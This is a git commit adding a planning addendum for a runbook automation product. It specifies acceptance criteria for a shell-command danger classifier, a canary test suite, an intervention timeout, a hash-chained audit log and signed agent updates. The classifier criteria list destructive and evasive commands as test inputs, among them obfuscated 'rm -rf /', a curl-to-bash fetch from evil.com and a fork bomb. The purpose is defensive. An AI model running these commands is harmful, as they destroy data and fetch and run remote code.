Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting):

- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)

Total: 61 story points across 30 new stories
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions
--- a/products/06-runbook-automation/epics/epic-addendum-bmad.md
+++ b/products/06-runbook-automation/epics/epic-addendum-bmad.md
@@ -0,0 +1,81 @@
+# dd0c/run — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Runbook Parser
+
+### Story 1.7: Shell AST Parsing (Not Regex)
+As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
+
+**Acceptance Criteria:**
+- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
+- `eval $(echo 'rm -rf /')` classified as Dangerous.
+- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
+- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
+- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
+- Heredoc with an embedded destructive command classified as Dangerous.
+- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
+- `kubectl get pods -n production` classified as Safe.
+
+**Estimate:** 5 points
+
+---
+
+## Epic 2 Addendum: Action Classifier
+
+### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
+As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
+
+**Acceptance Criteria:**
+- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
+- All 50 classified as Dangerous — any miss is a blocking CI failure.
+- Suite count assertion prevents accidental removal of canary commands.
+- Runs on every push and PR.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 3 Addendum: Execution Engine
+
+### Story 3.8: Intervention Deadlock TTL
+As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
+
+**Acceptance Criteria:**
+- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
+- FailedClosed triggers out-of-band critical alert with execution context.
+- Human resolution before TTL transitions to Complete (no FailedClosed).
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Audit Trail
+
+### Story 5.7: Streaming Append-Only Audit with Hash Chain
+As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
+
+**Acceptance Criteria:**
+- Audit event available within 100ms of command execution (no batching).
+- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
+- WAL (write-ahead log): events survive agent crash and are recoverable.
+
+**Estimate:** 3 points
+
+### Story 5.8: Cryptographic Signatures for Agent Updates
+As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
+
+**Acceptance Criteria:**
+- Agent rejects binary update with invalid signature.
+- Agent rejects policy update signed only by SaaS key (requires customer key).
+- Agent accepts update with valid customer signature.
+- On failed signature verification, the agent keeps its existing policy (no degradation).
+
+**Estimate:** 3 points
+
+---
+
+**Total Addendum:** 15 points across 5 stories
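
The hash-chain criterion in Story 5.7 can be illustrated with a minimal sketch. This is not taken from the dd0c/run codebase: only the name `verify_chain()` comes from the acceptance criteria, while `append_event`, `GENESIS_HASH`, the event field names, and the choice of SHA-256 over canonical JSON are assumptions made for illustration. Each event stores the hash of its predecessor, so editing or deleting any earlier event invalidates every link after it.

```python
import hashlib
import json

# Assumed sentinel used as prev_hash for the first event in a chain.
GENESIS_HASH = "0" * 64


def _digest(prev_hash: str, payload: dict) -> str:
    """Hash the previous link together with a canonical JSON form of the payload."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_event(chain: list, payload: dict) -> dict:
    """Append one audit event, linking it to the current tail of the chain."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS_HASH
    event = {
        "payload": payload,
        "prev_hash": prev_hash,
        "hash": _digest(prev_hash, payload),
    }
    chain.append(event)
    return event


def verify_chain(chain: list) -> bool:
    """Return True only if every event links to its predecessor and matches its own hash."""
    expected_prev = GENESIS_HASH
    for event in chain:
        if event["prev_hash"] != expected_prev:
            return False  # link broken: an event was removed, reordered, or relinked
        if event["hash"] != _digest(event["prev_hash"], event["payload"]):
            return False  # payload no longer matches its recorded hash
        expected_prev = event["hash"]
    return True
```

Under these assumptions, changing the payload of any stored event or deleting an event from the middle makes `verify_chain()` return `False`. A chain like this does not by itself detect truncation of the most recent events; catching that would require recording the latest hash somewhere the agent cannot rewrite.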